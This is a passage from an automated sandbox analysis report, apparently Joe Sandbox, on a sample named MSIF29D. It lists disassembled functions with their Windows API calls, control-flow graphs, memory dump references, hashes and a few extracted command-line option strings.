                                                                                                                                                                                                                                                                      • Instruction ID: 93f3fa90ebc3971281a7e50708c062242b6d28cbb7a5af5e6dd166ed79be84ce
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc9c102c4ddbcecdad391a2c5cf84a9ff42c24bdea911e02a9ee3e9983cff901
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C317C71A00609ABD720DF59CC45BBFFBB9FF44B10F10452AE515A7280DBB9A9049B90
                                                                                                                                                                                                                                                                      Function 00FE70BB Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 303 fe70bb-fe70c6 304 fe70c8-fe70d2 303->304 305 fe70d4-fe70da 303->305 304->305 306 fe7108-fe7113 call fd7370 304->306 307 fe70dc-fe70dd 305->307 308 fe70f3-fe7104 RtlAllocateHeap 305->308 312 fe7115-fe7117 306->312 307->308 309 fe70df-fe70e6 call fe5245 308->309 310 fe7106 308->310 309->306 316 fe70e8-fe70f1 call febf83 309->316 310->312 316->306 316->308
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,?,?,00FE596A,00000001,00000364,?,00000006,000000FF,?,00FD6CE7,00000000,00FE3841,00000000), ref: 00FE70FC
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                      • Opcode ID: 157c99e74b74d856403dfd5c65e554d8e50a7bb7199e60364354565ae25df0dd
                                                                                                                                                                                                                                                                      • Instruction ID: 503e148b1764feed1e48f8ed3b9325e197fd0dbb2abb97e9a14908276426d51b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 157c99e74b74d856403dfd5c65e554d8e50a7bb7199e60364354565ae25df0dd
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18F0E932A0C3A46B9B327B239C01B5B774EAF417B0B144021FE14EA190CF64EC00B6E1
                                                                                                                                                                                                                                                                      Function 00FB5940 Relevance: 1.3, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 319 fb5940-fb596f 320 fb598f-fb59a0 319->320 321 fb5971-fb597f 319->321 322 fb5988 321->322 323 fb5981-fb5982 CloseHandle 321->323 322->320 323->322
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,8F6E4A30,00000000,?,?,?), ref: 00FB5982
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                      • Opcode ID: a1d302253fd5171f0e462956b4ee43adc944ffc7271d4acdf0029142083b49cf
                                                                                                                                                                                                                                                                      • Instruction ID: c2a56da8dc8059ca2f2135e079b021af3f1088580f2527fabb3d7a1e18967d61
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1d302253fd5171f0e462956b4ee43adc944ffc7271d4acdf0029142083b49cf
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0F0C271A04648EFC710CF59D944B96FBF8EB05B70F1043AAF910C7690D7369800CB90

                                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                                      Function 00FB4BA0 Relevance: 33.5, APIs: 22, Instructions: 502comCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB57C0: GetCurrentProcess.KERNEL32(00000008,?,8F6E4A30,?,-00000010), ref: 00FB57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB57C0: OpenProcessToken.ADVAPI32(00000000), ref: 00FB57D7
                                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00FB4C15
                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00FF72B0,00000000,00000004,01005104,00000000,?), ref: 00FB4C45
                                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00FB5187
                                                                                                                                                                                                                                                                      • _com_issue_error.COMSUPP ref: 00FB51B5
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 928366108-0
                                                                                                                                                                                                                                                                      • Opcode ID: b6f16c7f9e3278367dba8f652b0355a48883a8a7873e55e51f1c35333bc2a836
                                                                                                                                                                                                                                                                      • Instruction ID: 17bb84dd7a465bd037f5c4a80ed794f08b4a44802e55c9bbe6820dcae12a9229
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6f16c7f9e3278367dba8f652b0355a48883a8a7873e55e51f1c35333bc2a836
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D022CD70E04388DFEB11DFA9C948BEDBBB8AF45304F248199E404EB281D7799A45DF61
                                                                                                                                                                                                                                                                      Function 00FBC870 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366registryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00FBCBB6
                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,0100E6D0,00000800), ref: 00FBCBD3
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: OpenQueryValue
                                                                                                                                                                                                                                                                      • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                                                                                                                                                                                                                      • API String ID: 4153817207-482544602
                                                                                                                                                                                                                                                                      • Opcode ID: f47a6d150a01730339d616b6ee2260b9c4e16131d49cb2b4865f6b1aeb2c022e
                                                                                                                                                                                                                                                                      • Instruction ID: afb660e374583c41335fbb10bffc4f59ff4c8980279ac77c3749b31c293da32c
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f47a6d150a01730339d616b6ee2260b9c4e16131d49cb2b4865f6b1aeb2c022e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BC13475E042168ADB35AF16C8112FBB7A1FF90760F58845AE889DB294E731CD81EFD0
                                                                                                                                                                                                                                                                      Function 00FEDE24 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
                                                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00FE42D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FEDEE5
                                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00FE42D9,?,?,?,00000055,?,-00000050,?,?), ref: 00FEDF10
                                                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00FEDFA4
                                                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00FEDFB2
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00FEE073
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                                                                                                                      • String ID: utf8
                                                                                                                                                                                                                                                                      • API String ID: 4147378913-905460609
                                                                                                                                                                                                                                                                      • Opcode ID: a45429bf267aaeef427e63634c436b3d1f9a75c837501839d566d76b82c1a421
                                                                                                                                                                                                                                                                      • Instruction ID: e064b55fba93eaeff5e444ff74ad97cc2f0f37b0cd04dec301174fd219be8d4b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a45429bf267aaeef427e63634c436b3d1f9a75c837501839d566d76b82c1a421
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83712872A00386AADB24AB36DC46BB773A9EF14710F14442AF605DB581FBB4DD40F7A1
                                                                                                                                                                                                                                                                      Function 00FB3860 Relevance: 10.7, APIs: 7, Instructions: 227processCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,8F6E4A30,?), ref: 00FB38CB
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FB390B
                                                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(?,00000000), ref: 00FB395F
                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00FB397A
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FB3A8E
                                                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(?,00000000), ref: 00FB3AA2
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00FB3AF0
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 708755948-0
                                                                                                                                                                                                                                                                      • Opcode ID: 475821b5abf94bafefe3c90f73e06f55cd7cbd5858733f9572c5e86dfce23164
                                                                                                                                                                                                                                                                      • Instruction ID: 21cf8d5d330484575798779ef6146d2dd1c8cca422d9658d6e5747c224d8f082
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 475821b5abf94bafefe3c90f73e06f55cd7cbd5858733f9572c5e86dfce23164
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FFA108B5D01249DFDB10DFA9D988BEEBBF8BF48314F248159E805AB280D7745A44DFA0
                                                                                                                                                                                                                                                                      Function 00FEF032 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                      • Opcode ID: d2d9fe452b112201b4a5d4754c537b0bd0abd96733f6da60437662d0fc7ada12
                                                                                                                                                                                                                                                                      • Instruction ID: 879db61ab90a7affad51aa23b8baeaf8438f67412182224e02f87c204af4ecba
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2d9fe452b112201b4a5d4754c537b0bd0abd96733f6da60437662d0fc7ada12
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAD25872E082688FDB65CF29CD407EAB7B5EB44314F1441EAD90DE7241EB78AE859F40
                                                                                                                                                                                                                                                                      Function 00FEE5B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00FEE8D1,00000002,00000000,?,?,?,00FEE8D1,?,00000000), ref: 00FEE64C
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,00FEE8D1,00000002,00000000,?,?,?,00FEE8D1,?,00000000), ref: 00FEE675
                                                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,?,00FEE8D1,?,00000000), ref: 00FEE68A
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                      • Opcode ID: 8024f0f72dabb7e6fbc3679a05922bd30924394c01fe0859ebcecb5cace217af
                                                                                                                                                                                                                                                                      • Instruction ID: b0d5fa9613e4d1d5b4c2ec19328f93323b43961a608afb78bfa8a242802f8a45
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8024f0f72dabb7e6fbc3679a05922bd30924394c01fe0859ebcecb5cace217af
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D21C432E20285A6DB308F16E900BA773A6AF74B74B568424E90AD7114E732DD40E750
                                                                                                                                                                                                                                                                      Function 00FB9CC0 Relevance: 7.9, APIs: 5, Instructions: 441COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _swprintf$FreeLocal
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2429749586-0
                                                                                                                                                                                                                                                                      • Opcode ID: a00c8d408868e32c3298757a6b7ef591b14ce93fd34a58807442b2df4f0bd0ab
                                                                                                                                                                                                                                                                      • Instruction ID: 99fe22fa9f5bf0e41ea24b631354686c3cb96877d24e139db6b4e4e2825f6ec2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a00c8d408868e32c3298757a6b7ef591b14ce93fd34a58807442b2df4f0bd0ab
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83F19A71D04219ABDB19DFA9DC40BEEBBB5FF08310F144229F911AB280D779A941DFA1
                                                                                                                                                                                                                                                                      Function 00FEE788 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
                                                                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00FEE894
                                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00FEE8DD
                                                                                                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00FEE8EC
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00FEE934
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00FEE953
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 415426439-0
                                                                                                                                                                                                                                                                      • Opcode ID: c4ac0bad761eef0825e26a6ad484315c7cab22f57261335d8e11f56dc66961d2
                                                                                                                                                                                                                                                                      • Instruction ID: 9e70755a4146d494a9abe0638e6b8021dd5ca3335e61020cb0f7881f51984b9b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4ac0bad761eef0825e26a6ad484315c7cab22f57261335d8e11f56dc66961d2
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83519371E00259AFEB20EFA6EC45ABE73B8FF48710F184065E914E7190D774DA04EB61
                                                                                                                                                                                                                                                                      Function 00FE5D6D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _strrchr
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                      • Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                                                                                                                                      • Instruction ID: 4aecfaea1b6185569502e258352af61640a5ff21b0b50b604f236514faa1abf4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30B15772D046D59FDB258F69C881BFEBBA5EF58358F14816AE900EB341D234DD01EBA0
                                                                                                                                                                                                                                                                      Function 00FD33A8 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FD33B4
                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00FD3480
                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FD34A0
                                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00FD34AA
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                                                                                                      • Opcode ID: 493d87c015f04549534215ee96fb9a9919f8cc55fa74c89b18f99e225f24064a
                                                                                                                                                                                                                                                                      • Instruction ID: f9ff253ec0957cfbcff8006508c727a6d27805c530e2dea410d3c47249923f37
